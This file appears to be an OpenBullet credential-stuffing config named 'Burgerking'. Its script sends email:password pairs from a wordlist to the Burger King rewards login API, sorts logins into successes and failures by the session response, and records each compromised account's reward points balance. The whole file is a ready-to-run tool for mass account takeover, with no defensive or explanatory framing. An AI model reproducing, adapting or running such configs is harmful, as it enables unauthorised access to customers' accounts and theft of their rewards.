[SETTINGS]
{
  "Name": "Burgerking",
  "SuggestedBots": 10,
  "LastModified": "2018-06-29T05:54:35.5499982+00:00",
  "AdditionalInfo": "",
  "Author": "Mew",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST POST "https://rewards.bk.com/mobilem8-web-service/rest/app/loyalty/session/<USER>" AutoRedirect=TRUE 
  CONTENT "password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "{\"LoyaltyAppSession\":{\"" 
  KEYCHAIN Success OR 
    KEY "{\"LoyaltyAppSession\":{\"" 
PARSE "<SOURCE>" LR "rewardBalance\":" ",\"" Recursive=FALSE -> CAP "Points" "" "" 
